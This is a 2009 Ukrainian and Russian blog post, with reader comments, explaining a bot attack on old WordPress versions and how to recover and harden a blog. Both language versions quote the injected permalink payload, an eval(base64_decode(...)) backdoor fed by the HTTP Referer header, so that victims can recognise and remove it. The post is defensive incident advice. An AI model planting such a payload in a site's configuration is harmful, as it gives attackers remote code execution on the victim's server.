sitemap archive

Взломали ваш блог на Вордпресі. Не знаєте що робити? Тоді читайте!

в категорії wordpress фішки

теґи :

Українською

Вчора пройшла хвиля атаки і взлому блогів на вордпресі. А якщо погуглити, то можемо зробити висновок, що пострадали тисячі сайтів.

захищаєм блог від хакерівТак в чому полягала суть? А суть в тому, що дехто запустив в мережу бота, що виявляв старі версії WordPress (до версії 2.8.4) і користуючись старим багом, реєстрував юзера і використовуючи певних шаблон посилання отримував адмінські права, потім під цим юзером міняв шаблон ЧПУ в налаштуваннях, а далі модифікував (заражав) код теми, щоб підсовувати відвідувачам вірус чи ще якусь фігню.

І хоч мій блог досі працює на одній із старих версій вордпресу, але його ця напасть минувала. А все тому, що бот визначав версію блога по мета-тегу, що автоматом прописує вордпрес в усі теми, а я цей тег давним давно в себе видалив. Про те, як видалити цей тег, я писав раніше в статті: корисні функції в functions.php — раджу і вам таке зробити ;)

А тим, хто вже пострадав від цього віруса, черв'яка, бота (називайте як хочете) потрібно зробити:

  • В налаштуваннях ЧПУ, поміняти з
    /%postname%/%&({${evаl(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
    на
    /%postname%/
    (у вас може відрізнятись структура, по аналогії я думаю зрозумієте :))
  • Найдіть останнього зареєстрованого користувача на вашому сайті і знищіть його! Швидше за все, це буде MikeWink E-mail: bugbeemershonyhe@gmail.com
  • Оновити WordPress до версії 2.8.4

Але якщо немає бажання оновлюватись і хочете покращити безпеку свого блогу, ви можете заборонити всім доступ до адмінки окрім себе, за допомогою невеличкої правки .htaccess
Звичайно, було б добре коли у вас постійний статичний IP-адрес, тоді тільки б його і вказали. А якщо у вас динамічна айпішка, то можете вказати діапазон
Для цього зробіть наступне:

  • зайдіть на сайт myip.ru аби дізнатись ваш IP адрес (способів дізнатись зовнішній айпі дуже багато, я привів самий простий для блондинок). Ви наприклад побачили: ВАШ IP-АДРЕС: 91.134.98.173
  • створіть файл .htaccess в папці wp-admin вашого блогу і пропишіть там наступне:
    AuthUserFile /dev/null
    AuthGroupFile /dev/null
    AuthName "Access Control"
    AuthType Basic
    
    order deny,allow
    deny from all
    allow from 91.134.98.173
    

    а якщо у вас динамічна айпішка, то краще напишіть так:

    
    AuthUserFile /dev/null
    AuthGroupFile /dev/null
    AuthName "Access Control"
    AuthType Basic
    
    order deny,allow
    deny from all
    allow from 91.134.0.0/255.255.0.0
    

    Детальніше про синтаксис директив Allow, Deny для Apache htaccess читайте тут.

  • Збережіть файл. Все.

Тепер, до адмінки вашого блогу зможете потрапити лише ви з вашого комп'ютера. А якщо ви будете в дорозі, або в інтернет-кафе і захочете, зайти в адмінку блога, а вас не буде пускати (швидше за все, ви побачите помилку 404), бо айпішка не входить у вказаний діапазон, то тоді вам потрібно буде зайти по фтп на хостинг і тимчасово переіменувати файл .htaccess. І тут мабудь хтось з вас подумав: «Це що, я ще й маю пароль на фтп пам'ятати для таких випадків?» — Ну а що ви хотіли, прийдеться жертувати зручністю заради безпеки. Це як у відомій цитаті: «Так вам шашечки или ехать?!»

Бережіть себе і бережіть свій блог.

По русски

Вчера прошла волна атаки и взлома блогов на вордпрессе. И если погуглить, то можно судить, что пострадали тысячи блогов.

Но как все это произошло? А случилось вот что: кое-кто запустил в сеть бота, который находил старые версии WordPress (до версии 2.8.4) и пользуясь старым багом, регистрировал юзера и используя определенную ссылку получал права админа на блоге, потом под этим юзером менял шаблон ЧПУ в настройках, а далее модифицировал (заражал) код темы.

И хотя мой блог до сих пор работает на одной из старых версий вордпресса, но не пострадал. А все потому, что бот определял версию блога по мета-тегу, который автоматически прописывает вордпресс во все темы, а я этот тег давным-давно у себя удалил. Про то, как удалить этот тег, я писал ранее в статье: корисні функції в functions.php — советую и вам так же сделать ;)

А тем, кто уже пострадал от этого вируса, червья, бота (называйте как хотите) нужно:

  • В настройках ЧПУ, поменять с
    /%postname%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
    на
    /%postname%/
    (у вас может отличаться структура, по аналогии думаю поймете, что где поменять :))
  • Найдите последнего зарегистрированного пользователя на вашем сайте и уничтожьте его! Скорее всего , это будет MikeWink E-mail: bugbeemershonyhe@gmail.com
  • Обновите WordPress до версии 2.8.4

А если нет желания обновляться и хотите улучшить безопасность своего блога, то вы можете запретить всем доступ к админке, кроме себя, с помощю небольшой правки .htaccess
Конечно, было бы лучше, если у вас постоянный статический IP-адрес, тогда тольки бы его и указывали. Но в случае динамического айпи-адреса можете указывать диапазон адресов.
Для это сделайте следующее:

  • зайдите на сайт myip.ru чтобы узнать ваш IP адрес. К примеру: ВАШ IP-АДРЕС: 91.134.98.173
  • создайте файл .htaccess в папке wp-admin вашего блога и пропишите там следующее:
    AuthUserFile /dev/null
    AuthGroupFile /dev/null
    AuthName "Access Control"
    AuthType Basic
    
    order deny,allow
    deny from all
    allow from 91.134.98.173
    

    в случае динамического IP-адреса, напишите так:

    
    AuthUserFile /dev/null
    AuthGroupFile /dev/null
    AuthName "Access Control"
    AuthType Basic
    
    order deny,allow
    deny from all
    allow from 91.134.0.0/255.255.0.0
    

    Подробнее о синтаксисе директив Allow, Deny для Apache htaccess читайте здесь.

  • Сохраните файл. Все.

Теперь, к админке вашего блога зайти можете только вы с вашого компьютера. Ну а если вы будете в дороге, или в интернет-кафе и захотите, зайти в админку блога, а вас не будет пускать (скорей всего, вы увидите сообщение об ошибке 404), потому что IP-адрес не входит в указанный диапазон, то тогда вам нужно будет зайти по фтп на хостинг и временно переименовать файл .htaccess. И тут, наверное, кто-то из вас подумал: «Это я еще должен и пароль на фтп помнить для таких случаев?» — Ну а что вы хотели, приходится жертвовать удобством ради безопасности. Помните цитату: «Так вам шашечки или ехать?!»

Берегите себя и берегите свой блог.

Post to Twitter

18 коментарівrss-comments

[@] ]]>ELECTRIC]]> 7 Вересня 2009 09:10

Але якщо на сайті немає реєстрації користувачів і є лише один користувач , то ця проблема не є актуальна.

]]>lilumi]]> 7 Вересня 2009 10:22

ти знаєш, на рахунок цього, я не впевнений :) Можливо той бот реєструється в обхід звичайної системи реєстрації, користуючись якимось багом вордпресу.

 
 
[@] ]]>ELECTRIC]]> 7 Вересня 2009 22:54

щось дуже сумніавюся. перевірив на двох блогах. там по одному зареєстрованому адміну і все.

 
]]>virua]]> 8 Вересня 2009 09:48

Можу погодитися з думкою ELECTRIC’а, що в даному випадку ламають сайти, де є дозволена реєстрація користувачів. З власного досвіду: з 4-х моїх блогів на ВП інфіковано лише той, де є дозволена реєстрація.

]]>lilumi]]> 10 Вересня 2009 10:59

судячи з коментарів у Лекактуса: http://lecactus.ru/2009/09/06/4712/#comment-33308 — навіть при закритій реєстрації бот умудряється реєструватись

 
 
]]>Юрко Червоний™]]> 16 Вересня 2009 19:33

Я обмежив доступ по ір, у мене постійна адреса.

 
]]>Юрко Червоний™]]> 16 Вересня 2009 19:38

До речі, у мене всюди заборонене реєстрація. а також немає показу номеру версії. І всі сайто-блоґи цілі.

]]>lilumi]]> 16 Вересня 2009 19:40

правильно робиш

 
 
[@] ]]>Homelab]]> 20 Вересня 2009 20:53

Практика показує, що взламати можна все. рекомендую частіше робити бекапи, бо якщо блог стане популярним, то ламатимуть його однозначно… таке життя

 
[@] ]]>maque]]> 6 Жовтня 2009 17:47

Мій блоґ ніби на місці. Слава Богу!

 
]]>kkostishin]]> 20 Лютого 2010 16:30

Дякую за статтю! Але вже переконався на практиці, що бекапи – надзвичайно потрібна річ!!!

 
[@] ]]>maque]]> 5 Вересня 2010 01:03

Перепрошую за офф-топ, але мене цікавить, чи Ви приймаєте гостьові пости. Якщо так, то якої тематики. Дякую.

]]>lilumi]]> 5 Вересня 2010 11:36

Привіт. в принципі як експеримент можна попробувати гостьовий пост. Тематика: цікаве про комп’ютери, інтернет-сервіси, про якісь фішки для WordPress

 
 
[@] ]]>maque]]> 5 Вересня 2010 12:05

Дякую за відповідь. Подумаю, що можу цікавого запропонувати. :)

 
]]>Макс]]> 2 Грудня 2010 09:29

Давно використовую .htaccess для обмеження доступу в адмін частину у сайтах які будую на вордпресі, і виявляється не дарма.

 
[@] ]]>Тетяна]]> 13 Грудня 2010 10:16

А якщо вже взломали,що тодi робити???

]]>lilumi]]> 13 Грудня 2010 12:46

ну якщо сайт не робочий, то відновити з бекапу, поміняти паролі і обновити вордпресс та плагіни

 
 
]]>Peter L.]]> 20 Грудня 2010 21:04

Хорошая статья и много полезной информации. Держите его вверх.

 

Ваш коментар

LilumiМене звати LiluMi, а це мій блоґ. Тут про веб-розробку та лайфхаки. Рекомендую підписатись на RSS Інформацію про мене читайте на сторінці me LiluMi
UA TOP Bloggers
Рейтинг блогов Рейтинг блога lilumi.org.ua Рейтинг блогов



Тобі передають привіт 54 медвежаток. Це підняло тобі настрій на 4,861 а в Австралії живе колібрі у якої дзьобик довжиною на 29.05см.